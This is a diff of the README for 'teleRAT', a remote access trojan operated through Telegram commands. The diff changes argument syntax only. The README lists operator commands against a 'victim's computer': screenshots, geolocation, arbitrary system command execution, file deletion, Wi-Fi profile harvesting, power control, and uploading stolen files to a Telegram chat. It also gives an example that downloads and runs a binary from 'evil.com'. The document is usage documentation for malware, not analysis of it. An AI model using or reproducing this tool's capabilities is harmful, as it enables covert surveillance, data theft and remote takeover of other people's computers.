1d8/teleRAT/README.md

 * **/screenshot** - takes screenshots. requires the number of screenshots to take (EX: /screenshot 5 <- to take 5 screenshots)
 * **/location** - returns location info (region, state, zip code, estimated coordinates, timezone, country, ip address)
 * **/metadata** - returns metadata info about a specified file. requires filepath as an additional argument (EX: /metadata C:\Users\Username\Files\special.java <- will return metadata info about special.java)
-* **/execute** - executes specified system command. requires 2 additional arguments: the system command and additional arguments to pass to that system command (EX: /execute cmd.exe {/c,ver} or /execute binary.exe none} in order to execute binary.exe with no arguments)
+* **/execute** - executes specified system command. requires 2 additional arguments: the system command and additional arguments to pass to that system command (EX: /execute cmd.exe [/c,ver] or /execute binary.exe none} in order to execute binary.exe with no arguments)
 * **/power** - allows operator to shutoff, hibernate, or restart computer. requires 1 additional argument: hibernate, pd (to power down), or restart (EX: /power pd <- to power down the victim's computer)
 * **/ls** - provides operator with directory listing.
 If no additional argument is provided, it provides directory listing for directory in which malware is.
 Additional argument of a directory is optional (EX: /ls %APPDATA% <- provides directory listing for APPDATA directory)
 * **/delete** - deletes a user specified file.
 Additional argument of filepath is required (EX: /delete C:\Users\Username\Files\temp.txt <- deletes a file named temp.txt)
 * **/wreport** - provides information regarding the wireless profiles the computer has connected to in the past, the drivers, and a list of wireless interfaces.
 * **/remotebinary** - download and execute a remote binary.
-Requires 2 additional arguments: the URL where the binary is and any additional arguments to pass when executing the binary (EX: /remotebinary https://evil.com/file.exe noargs <- execute file.exe with no arguments or /remotebinary https://evil.com/file.exe {-c,-f} <- to execute file.exe with flags c & f)
+Requires 2 additional arguments: the URL where the binary is and any additional arguments to pass when executing the binary (EX: /remotebinary https://evil.com/file.exe noargs <- execute file.exe with no arguments or /remotebinary https://evil.com/file.exe [-c,-f] <- to execute file.exe with flags c & f)
 * **/processes** - returns a list of running processes and services
 * **/gather** - return a specified file. requires 1 additional argument: the filepath (EX: /gather C:\Users\username\important\file.xlsx <- grab and upload file.xlsx to Telegram chat)
 * **/report** - provides a hardware report & Windows version to operator